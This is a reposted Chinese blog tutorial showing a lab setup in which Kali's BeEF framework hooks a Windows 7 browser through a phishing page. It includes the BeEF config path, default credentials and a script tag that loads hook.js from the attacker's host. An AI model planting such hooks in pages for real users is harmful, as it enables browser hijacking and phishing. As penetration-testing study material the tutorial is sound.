欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

Kali之Beef利用Xss进行钓鱼

程序员文章站 2022-05-16 10:58:56
...

1、操作准备

攻击机:Kali(ip地址:192.168.1.107)
受害者:Windows7 x64(ip地址:192.168.1.163)

2、配置Beef

进入beef的配置文件里

aaa@qq.com:~# vim /etc/beef-xss/config.yaml

Kali之Beef利用Xss进行钓鱼
在这里可以看到beef的默认用户名和密码,也可以进行修改,我这里对默认的密码进行了修改
注:(默认beef用户名和密码位User:beef,Password:beef)

3、启动Beef

aaa@qq.com:~# beef-xss

Kali之Beef利用Xss进行钓鱼Kali之Beef利用Xss进行钓鱼
输入账号密码进行登录

4、配置apache2

1.进入apache2的目录下将自己制作好的网页替换掉默认的index.html
2.将<script src="http://192.168.1.107:3000/hook.js"></script>挂到自己制作好的网页中
3.启动apache2

aaa@qq.com:~# /etc/init.d/apache2 start

5、进行钓鱼

1.Windows7访问该网页
Kali之Beef利用Xss进行钓鱼2.在kali上可以看到,受害者已经上线了
Kali之Beef利用Xss进行钓鱼
3.进行攻击
案例(这里通过beef给受害者发送一段音乐)
Kali之Beef利用Xss进行钓鱼
在受害者的浏览器上可以看到音乐已经被播放
Kali之Beef利用Xss进行钓鱼
warning :未经授权,不得转载
本文所介绍技术仅供参考学习,切勿恶意用途

相关标签: 渗透测试